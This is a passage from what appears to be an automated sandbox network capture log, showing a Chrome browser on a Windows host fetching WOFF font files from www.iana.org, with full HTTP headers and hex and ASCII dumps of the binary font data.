                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Expires: Thu, 10 Oct 2024 08:47:24 GMT
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Connection: close
                            Content-Type: font/woff
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:25 UTC8508INData Raw: 77 4f 46 46 00 01 00 00 00 02 67 40 00 0f 00 00 00 04 7d d4 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 44 45 46 00 00 01 58 00 00 01 38 00 00 01 a0 34 06 28 1b 47 50 4f 53 00 00 02 90 00 00 50 b2 00 00 a4 b6 87 fd a6 05 47 53 55 42 00 00 53 44 00 00 05 31 00 00 09 60 46 0c 8f 23 4f 53 2f 32 00 00 58 78 00 00 00 60 00 00 00 60 f8 c9 f3 ec 63 6d 61 70 00 00 58 d8 00 00 0c 72 00 00 0f b0 52 ed 6e c1 67 61 73 70 00 00 65 4c 00 00 00 0c 00 00 00 0c 00 08 00 1b 67 6c 79 66 00 00 65 58 00 01 3e f4 00 02 14 b4 c1 1d 2c e7 68 65 61 64 00 01 a4 4c 00 00 00 36 00 00 00 36 f8 be 09 8c 68 68 65 61 00 01 a4 84 00 00 00 21 00 00 00 24 0e af 0c 4f 68 6d 74 78 00 01 a4 a8 00 00 11 0b 00 00 25 be 3d ca 78 99 6b 65 72 6e 00 01 b5 b4 00 00 6d
                            Data Ascii: wOFFg@}GDEFX84(GPOSPGSUBSD1`F#OS/2Xx``cmapXrRngaspeLglyfeX>,headL66hhea!$Ohmtx%=xkernm
                            2024-10-10 08:17:25 UTC4080INData Raw: e8 f0 e8 a8 e8 d8 e8 04 62 72 74 5a 74 66 b4 91 65 f3 a2 0b a3 4b a2 cb 05 19 3e 4b 7c 94 e6 83 17 ff c8 fc 32 31 90 c8 0d ca a3 ab a2 af 48 ac 15 5d 1f dd 94 e6 2d cb 9b a2 db 3a c5 4f 68 4f 6c 53 d7 18 2b 3b b6 8a 36 47 77 93 1f 12 53 49 fb d9 b2 80 35 8f ee 89 ee 97 f5 8e 1e 8c 9a b5 96 18 42 72 b4 c3 f2 63 f9 ae d4 15 79 c8 ce 6f 16 6f bc 5b 9e 6d f3 25 cf c8 6e 17 df 11 3d 51 d0 33 7a 1a f3 1a 70 f3 b8 a3 eb e7 4c 9e 15 77 48 4c 91 b1 25 9e dd cc e4 5e 4c 71 ab d8 23 ed 4b 25 2e 26 3f bb c4 1e 5d f3 6c 1f 74 b3 5c 40 3b ef e5 b7 8a 43 32 9f 6f 11 87 74 cd 85 5f d1 b3 1d f1 c8 0d f9 9e ce f1 47 b6 cf 13 fe a5 f3 a8 03 1d 87 7c 50 d7 25 3f 66 62 8c 74 1e bd 54 70 56 64 27 9d 67 7c 9f 17 ab a4 ed 5d c6 ee a1 0f 19 57 f4 0a 9e bd 6e 6c 4f cc 5f b4 2f 96
                            Data Ascii: brtZtfeK>K|21H]-:OhOlS+;6GwSI5Brcyoo[m%n=Q3zpLwHL%^Lq#K%.&?]lt\@;C2ot_G|P%?fbtTpVd'g|]WnlO_/


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            18192.168.2.449773192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:29 UTC592OUTGET /_img/2022/fonts/NotoSans-Bold.woff HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Origin: http://www.iana.org
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: font
                            Referer: https://www.iana.org/_css/2022/iana_website.css
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:30 UTC1077INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 07:21:16 GMT
                            Server: Apache
                            Last-Modified: Tue, 05 Oct 2021 16:31:06 GMT
                            Content-Length: 156596
                            Age: 3421
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Expires: Thu, 10 Oct 2024 07:51:16 GMT
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Connection: close
                            Content-Type: font/woff
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:30 UTC12577INData Raw: 77 4f 46 46 00 01 00 00 00 02 63 b4 00 0f 00 00 00 04 83 80 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 44 45 46 00 00 01 58 00 00 01 38 00 00 01 a0 35 0e 28 1b 47 50 4f 53 00 00 02 90 00 00 51 a7 00 00 a6 1e c9 c2 8d 0d 47 53 55 42 00 00 54 38 00 00 05 31 00 00 09 60 46 0c 8f 23 4f 53 2f 32 00 00 59 6c 00 00 00 60 00 00 00 60 f9 f5 f7 27 63 6d 61 70 00 00 59 cc 00 00 0c 72 00 00 0f b0 52 ed 6e c1 67 61 73 70 00 00 66 40 00 00 00 0c 00 00 00 0c 00 08 00 1b 67 6c 79 66 00 00 66 4c 00 01 3a bb 00 02 18 cc ce 7c 94 21 68 65 61 64 00 01 a1 08 00 00 00 36 00 00 00 36 f9 34 09 90 68 68 65 61 00 01 a1 40 00 00 00 21 00 00 00 24 0f 24 0d 37 68 6d 74 78 00 01 a1 64 00 00 10 c8 00 00 25 be a8 55 13 aa 6b 65 72 6e 00 01 b2 2c 00 00 6d
                            Data Ascii: wOFFcGDEFX85(GPOSQGSUBT81`F#OS/2Yl``'cmapYrRngaspf@glyffL:|!head664hhea@!$$7hmtxd%Ukern,m


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            19192.168.2.449775192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:32 UTC595OUTGET /_img/2022/fonts/NotoSans-Regular.woff HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Origin: http://www.iana.org
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: font
                            Referer: https://www.iana.org/_css/2022/iana_website.css
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:32 UTC1078INHTTP/1.1 200 OK
                            Date: Wed, 09 Oct 2024 18:25:31 GMT
                            Server: Apache
                            Last-Modified: Tue, 05 Oct 2021 16:31:06 GMT
                            Content-Length: 157504
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Expires: Wed, 09 Oct 2024 18:55:31 GMT
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Age: 49921
                            Connection: close
                            Content-Type: font/woff
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:32 UTC12576INData Raw: 77 4f 46 46 00 01 00 00 00 02 67 40 00 0f 00 00 00 04 7d d4 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 44 45 46 00 00 01 58 00 00 01 38 00 00 01 a0 34 06 28 1b 47 50 4f 53 00 00 02 90 00 00 50 b2 00 00 a4 b6 87 fd a6 05 47 53 55 42 00 00 53 44 00 00 05 31 00 00 09 60 46 0c 8f 23 4f 53 2f 32 00 00 58 78 00 00 00 60 00 00 00 60 f8 c9 f3 ec 63 6d 61 70 00 00 58 d8 00 00 0c 72 00 00 0f b0 52 ed 6e c1 67 61 73 70 00 00 65 4c 00 00 00 0c 00 00 00 0c 00 08 00 1b 67 6c 79 66 00 00 65 58 00 01 3e f4 00 02 14 b4 c1 1d 2c e7 68 65 61 64 00 01 a4 4c 00 00 00 36 00 00 00 36 f8 be 09 8c 68 68 65 61 00 01 a4 84 00 00 00 21 00 00 00 24 0e af 0c 4f 68 6d 74 78 00 01 a4 a8 00 00 11 0b 00 00 25 be 3d ca 78 99 6b 65 72 6e 00 01 b5 b4 00 00 6d
                            Data Ascii: wOFFg@}GDEFX84(GPOSPGSUBSD1`F#OS/2Xx``cmapXrRngaspeLglyfeX>,headL66hhea!$Ohmtx%=xkernm


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            20192.168.2.449776192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:32 UTC600OUTGET /_img/2022/fonts/SourceCodePro-Regular.woff HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Origin: http://www.iana.org
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: font
                            Referer: https://www.iana.org/_css/2022/iana_website.css
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:32 UTC1077INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 01:55:41 GMT
                            Server: Apache
                            Last-Modified: Tue, 05 Oct 2021 16:31:06 GMT
                            Content-Length: 89024
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Expires: Thu, 10 Oct 2024 02:25:41 GMT
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Age: 22911
                            Connection: close
                            Content-Type: font/woff
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:32 UTC5777INData Raw: 77 4f 46 46 4f 54 54 4f 00 01 5b c0 00 0f 00 00 00 02 23 38 00 02 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 41 53 45 00 01 27 cc 00 00 00 46 00 00 00 46 65 1e 5d bd 43 46 46 20 00 00 23 a8 00 01 04 23 00 01 63 cf 57 92 7b 7d 44 53 49 47 00 01 4a d4 00 00 10 ea 00 00 18 e4 df e8 46 6e 47 44 45 46 00 01 28 14 00 00 01 86 00 00 02 7e d2 1c d4 f0 47 50 4f 53 00 01 29 9c 00 00 09 01 00 00 13 58 fe 27 05 45 47 53 55 42 00 01 32 a0 00 00 0a e3 00 00 19 94 85 47 46 ef 4f 53 2f 32 00 00 01 b4 00 00 00 59 00 00 00 60 95 dc d7 f2 53 56 47 20 00 01 3d 84 00 00 08 3b 00 00 1c 60 d8 d6 f0 de 63 6d 61 70 00 00 0b 20 00 00 18 70 00 00 35 04 65 81 5c 13 68 65 61 64 00 00 01 58 00 00 00 33 00 00 00 36 04 f3 d4 97 68 68 65 61 00 00 01 8c 00 00 00
                            Data Ascii: wOFFOTTO[#8BASE'FFe]CFF ##cW{}DSIGJFnGDEF(~GPOS)X'EGSUB2GFOS/2Y`SVG =;`cmap p5e\headX36hhea
                            2024-10-10 08:17:32 UTC6800INData Raw: 16 ea a8 cb 92 95 7a ea b3 61 c7 9d 1e 0f 0d d8 72 e1 ca 8d 03 27 6b ad b3 de 06 1b 6d b2 d9 62 0b 2b 93 cd 57 b9 62 fe 3e 2c d3 03 0c 6e 57 10 45 e1 b9 f7 9e bf b6 6d db b6 fb 6c db b6 6d db b6 6d bb cf b6 6d 1b 75 bb 92 3d 49 be ac 1d 9d e8 4c 12 cc ec 19 17 e1 59 49 9a d3 e7 24 69 43 9f 97 64 07 7d 41 c2 b7 f4 45 09 79 e8 4b 92 14 a0 2f 4b d2 9a be 82 57 d9 93 e8 6b 92 cc a1 af 4b a8 48 df 90 a4 31 7d 53 92 1e f4 2d 49 1a d1 b7 25 99 41 df c1 a7 ec 82 f4 33 7c ce 6e 42 bf 90 50 83 7e 29 a1 1a fd 4a 42 4d fa b5 24 2d e9 37 92 6c a3 df 22 0f 62 e4 95 64 0a cd 27 c9 2c 9a 5f 92 a9 b4 80 84 ba b4 a0 24 e3 68 21 09 3b 68 61 d4 c1 13 a8 2b c9 34 5a 4f 92 99 b4 be 24 d3 69 03 09 f5 e9 20 49 15 a0 83 25 69 41 87 48 f8 91 0e 95 f0 1d 1d 26 e1 1b 3a 5c c2 f7 74
                            Data Ascii: zar'kmb+Wb>,nWEmlmmmu=ILYI$iCd}AEyK/KWkKH1}S-I%A3|nBP~)JBM$-7l"bd',_$h!;ha+4ZO$i I%iAH&:\t
                            2024-10-10 08:17:32 UTC1360INData Raw: 5f 21 90 6f 58 70 fd 8e 6d 6c 39 98 cd 86 80 9f c6 47 10 3d 82 e4 11 64 8f a0 78 04 d5 23 68 1e c1 61 0b 2a fd 08 a2 47 90 3c 82 90 67 fb 35 7e 71 e7 ad 80 43 12 e2 8f 57 73 de 2a de 7f 83 b6 91 26 24 e4 77 68 cb 67 98 6a fb 2d 0a bd dd 8b 0b 1f ea fd fd 1e a2 4e b6 2c 28 cb 0d 7e 3c 09 bf 42 c1 7d cb ba c7 96 6d 3f 4a e1 ce a3 d6 ed 87 e9 11 54 8f 82 1a 02 93 e6 fb e0 d3 33 78 f6 9d 9e 01 b7 8a e6 e5 54 f6 b7 8b ab fc ec be 72 d7 ab dc 8e 8a d8 de ee 5d 3f 0e ff 84 db 76 76 bf 5f 82 df 84 4d f8 ce dd 6e ee 7b 77 3d 9e dc 0f cb 8f cb 5f dd 4f d7 6e 2d f5 e7 ee d7 cb f8 5b 77 be ba df dd f2 07 9f fd f9 d2 d5 97 ee e7 7b 27 29 cb 42 e6 99 c7 61 bc 6f c9 89 67 ee 85 ec 7b f0 d8 0a b2 33 90 ac 9f c4 fb 30 7f e6 c3 6e 9d e3 18 8a 3d af 6b 39 f9 7e 76 9e b1 1f
                            Data Ascii: _!oXpml9G=dx#ha*G<g5~qCWs*&$whgj-N,(~<B}m?JT3xTr]?vv_Mn{w=_On-[w{')Baog{30n=k9~v
                            2024-10-10 08:17:32 UTC12240INData Raw: 1a 05 1a 0c 44 92 e0 38 ce 97 2d ef 69 78 06 e1 e0 e2 b7 e7 00 95 50 2a 90 3c 59 62 e8 4b e7 a9 73 67 ca 4a aa 08 52 c8 a4 ef 34 d0 6a 84 5a 81 96 be 69 16 fa b0 a1 6f da 6e 6a fb 6d 62 a9 3c d5 0a 98 51 47 d7 e5 be 3d 44 bf 87 eb 4f e0 c5 87 47 d3 f6 cb f1 d4 b9 70 4c 9e c2 b9 7a f2 f7 6b 17 ce 13 d7 fa 90 fb 19 4b a6 34 26 6f b2 e8 43 5c 16 e1 5a e8 34 5c 13 6d c2 89 e2 7a f9 7f f8 f2 f5 e3 07 3f 9c fd 65 5c 64 43 94 a9 0a a8 a0 06 0b 07 a1 d6 42 a3 40 83 a5 2f 87 02 4a a8 a0 96 95 0b 2a 52 6a 83 3f 7b 11 9e 09 f4 06 5d 84 5b 97 d9 d8 bb a2 8d fd 4e bc b1 df 49 36 f6 3b e9 c6 4b fb 08 e8 22 7c c6 d9 c6 de 9b 6f fc 9f 6f bb d8 8e 1b 06 c3 30 7c 2b da 97 c4 b0 94 64 f7 9c ae ca fb 30 27 93 81 d2 dd 57 9e b7 ad 34 a5 d0 f3 09 ec df 61 63 ef 49 90 7e f5 28
                            Data Ascii: D8-ixP*<YbKsgJR4jZionjmb<QG=DOGpLzkK4&oC\Z4\mz?e\dCB@/J*Rj?{][NI6;K"|oo0|+d0'W4acI~(
                            2024-10-10 08:17:32 UTC13600INData Raw: d4 b8 7b fb 8a 95 5b 4d b3 33 b5 4b e6 cf 5a 12 e1 f3 d1 c0 dd 69 5f 98 40 bf e3 2a bc 0d 1f 7b c3 04 7f 30 d0 19 06 7f 69 90 13 64 7f 9b ac 0c fc 4b df 66 fb f2 ba 41 25 1f 3d 8c 14 ee 0f 6c b0 c5 a6 a9 8f d9 83 59 02 b6 d6 62 7a a8 ca 68 99 73 81 9a e3 3b 6a 41 ec 6d 21 f4 df 16 2b 59 11 ee b1 ca 9a 04 fc a6 05 3c 68 17 e1 be 5a c9 d7 80 86 ad 3e ba e2 f0 4f 47 ab b5 74 16 4e 6f a6 fe 60 b1 d5 13 54 44 eb 72 dc 33 94 a9 9a 6e 42 3f 89 3d 61 fc 78 2b c6 67 d4 10 fc b8 bf d0 cf 1f c7 60 92 eb d0 4e 42 b6 e0 73 ca 86 5e f0 e4 09 b1 4c ff a5 70 bf 5a dc dc 45 02 55 05 4f b8 c4 f8 9c 05 f8 fb 3f 9c 4e d0 c3 47 22 cb 06 19 97 35 7e 58 23 cd 98 12 08 78 54 71 e4 b1 63 62 9c a0 73 ac 05 7e 9f 09 9e 9f d2 4a f0 4b 41 83 d1 96 94 30 c6 e3 83 6e 0a 44 dc 20 58 0f
                            Data Ascii: {[M3KZi_@*{0idKfA%=lYbzhs;jAm!+Y<hZ>OGtNo`TDr3nB?=ax+g`NBs^LpZEUO?NG"5~X#xTqcbs~JKA0nD X
                            2024-10-10 08:17:32 UTC9520INData Raw: 74 60 b5 12 ce b0 d0 a9 ba b1 08 74 e5 60 d8 af 82 e8 f7 9d b3 6c a9 bd ea aa 15 73 39 2d e7 62 bd e2 d5 1d eb 09 a3 17 2d 21 3f 9b f0 9a d3 a6 fd b4 05 7d 9a e0 1c 1e 8f 12 96 fc 5c bb 30 e7 b1 bc 39 f7 d6 cb fa 9c 95 8e 17 54 57 6e 33 37 1d e6 5c ef 83 61 8c fd 4c 89 21 d1 7d 60 0e 3a 33 68 57 88 2c 86 57 74 c0 48 b0 29 26 43 d8 fa 5b 15 c5 af 70 cc 01 15 a4 6b 6f 53 5b 5b 71 cc cc f4 5b 97 1a 14 2f 6e 59 4f 98 68 36 87 74 9a cb f7 65 71 85 17 80 91 e4 33 84 0a ed df c5 f1 cf e3 f8 91 60 54 4c 4c 59 a2 5d fc 5b 59 93 bc f9 f6 ad 17 0d b7 56 38 a5 ab ae de 66 6e 2c 9f 7d a3 37 4e 62 20 4e 62 48 c5 dc 7a 6b 7e aa 06 92 8d 44 94 70 48 11 68 15 41 a3 0f 9e f5 26 3c eb 28 ba 36 01 81 19 45 64 06 68 69 fe 34 4e 24 8d 2c 99 11 2e 32 23 2d 49 c7 2f 09 a5 dc a1
                            Data Ascii: t`t`ls9-b-!?}\09TWn37\aL!}`:3hW,WtH)&C[pkoS[[q[/nYOh6teq3`TLLY][YV8fn,}7Nb NbHzk~DpHhA&<(6Edhi4N$,.2#-I/


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            21192.168.2.449777192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:32 UTC592OUTGET /_img/2022/fonts/NotoSans-Bold.woff HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Origin: http://www.iana.org
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: font
                            Referer: https://www.iana.org/_css/2022/iana_website.css
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:32 UTC1078INHTTP/1.1 200 OK
                            Date: Wed, 09 Oct 2024 18:26:07 GMT
                            Server: Apache
                            Last-Modified: Tue, 05 Oct 2021 16:31:06 GMT
                            Content-Length: 156596
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Expires: Wed, 09 Oct 2024 18:56:07 GMT
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Age: 49885
                            Connection: close
                            Content-Type: font/woff
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:32 UTC5776INData Raw: 77 4f 46 46 00 01 00 00 00 02 63 b4 00 0f 00 00 00 04 83 80 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 44 45 46 00 00 01 58 00 00 01 38 00 00 01 a0 35 0e 28 1b 47 50 4f 53 00 00 02 90 00 00 51 a7 00 00 a6 1e c9 c2 8d 0d 47 53 55 42 00 00 54 38 00 00 05 31 00 00 09 60 46 0c 8f 23 4f 53 2f 32 00 00 59 6c 00 00 00 60 00 00 00 60 f9 f5 f7 27 63 6d 61 70 00 00 59 cc 00 00 0c 72 00 00 0f b0 52 ed 6e c1 67 61 73 70 00 00 66 40 00 00 00 0c 00 00 00 0c 00 08 00 1b 67 6c 79 66 00 00 66 4c 00 01 3a bb 00 02 18 cc ce 7c 94 21 68 65 61 64 00 01 a1 08 00 00 00 36 00 00 00 36 f9 34 09 90 68 68 65 61 00 01 a1 40 00 00 00 21 00 00 00 24 0f 24 0d 37 68 6d 74 78 00 01 a1 64 00 00 10 c8 00 00 25 be a8 55 13 aa 6b 65 72 6e 00 01 b2 2c 00 00 6d
                            Data Ascii: wOFFcGDEFX85(GPOSQGSUBT81`F#OS/2Yl``'cmapYrRngaspf@glyffL:|!head664hhea@!$$7hmtxd%Ukern,m
                            2024-10-10 08:17:32 UTC6800INData Raw: 93 a3 ed 2e 74 e0 14 c7 e9 48 e3 69 b6 46 1d f7 7e 80 4f 99 5c df 63 bc bb 9d e5 4e 24 b6 4b da f7 95 72 8d b6 4a 1d 94 8b b4 ef 60 fd 81 6c a7 8d 25 df 76 ec 24 e5 6d 95 c3 5b 4a a3 49 39 7c 95 63 a6 95 43 89 97 96 73 90 d8 04 3e 7b 81 f5 7b b0 97 71 bc 5b cb 91 94 52 4e 36 72 a6 db 9d b8 4b b8 e1 c9 e5 08 ff c2 9a ff 45 1e 16 b2 df 1f f0 a9 45 5c cd 4f b2 ce b3 4e 4c 28 2b a8 93 92 1a 1f 65 9d 67 69 51 ef a6 a7 63 bc a7 07 51 6e a7 5d 4d 88 0d 91 54 9b b2 52 fa 20 d3 79 52 e2 49 48 4d df 59 8e f3 0d f6 9b a0 ac be e1 c4 0c 9c cb 97 9c d8 9e b1 ee db 52 e2 7b d2 89 e4 a5 44 5f e4 18 ea af ae e5 78 44 77 fe 93 fd fe 0f 67 7a 8c 3c 9c ce 11 0e 74 a2 02 b6 53 c1 f1 c7 24 f5 30 42 f0 31 d2 36 4e b0 e6 18 3e 95 4f ef dc cc 92 0f 72 54 73 c9 ed b5 ac 3f 89 75
                            Data Ascii: .tHiF~O\cN$KrJ`l%v$m[JI9|cCs>{{q[RN6rKEE\ONL(+egiQcQn]MTR yRIHMYR{D_xDwgz<tS$0B16N>OrTs?u


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            22192.168.2.449784192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:42 UTC595OUTGET /_img/2022/fonts/NotoSans-Regular.woff HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Origin: http://www.iana.org
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: font
                            Referer: https://www.iana.org/_css/2022/iana_website.css
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:42 UTC1078INHTTP/1.1 200 OK
                            Date: Wed, 09 Oct 2024 12:26:37 GMT
                            Server: Apache
                            Last-Modified: Tue, 05 Oct 2021 16:31:06 GMT
                            Content-Length: 157504
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Expires: Wed, 09 Oct 2024 12:56:37 GMT
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Age: 71465
                            Connection: close
                            Content-Type: font/woff
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:42 UTC12576INData Raw: 77 4f 46 46 00 01 00 00 00 02 67 40 00 0f 00 00 00 04 7d d4 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 44 45 46 00 00 01 58 00 00 01 38 00 00 01 a0 34 06 28 1b 47 50 4f 53 00 00 02 90 00 00 50 b2 00 00 a4 b6 87 fd a6 05 47 53 55 42 00 00 53 44 00 00 05 31 00 00 09 60 46 0c 8f 23 4f 53 2f 32 00 00 58 78 00 00 00 60 00 00 00 60 f8 c9 f3 ec 63 6d 61 70 00 00 58 d8 00 00 0c 72 00 00 0f b0 52 ed 6e c1 67 61 73 70 00 00 65 4c 00 00 00 0c 00 00 00 0c 00 08 00 1b 67 6c 79 66 00 00 65 58 00 01 3e f4 00 02 14 b4 c1 1d 2c e7 68 65 61 64 00 01 a4 4c 00 00 00 36 00 00 00 36 f8 be 09 8c 68 68 65 61 00 01 a4 84 00 00 00 21 00 00 00 24 0e af 0c 4f 68 6d 74 78 00 01 a4 a8 00 00 11 0b 00 00 25 be 3d ca 78 99 6b 65 72 6e 00 01 b5 b4 00 00 6d
                            Data Ascii: wOFFg@}GDEFX84(GPOSPGSUBSD1`F#OS/2Xx``cmapXrRngaspeLglyfeX>,headL66hhea!$Ohmtx%=xkernm


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            23192.168.2.449785192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
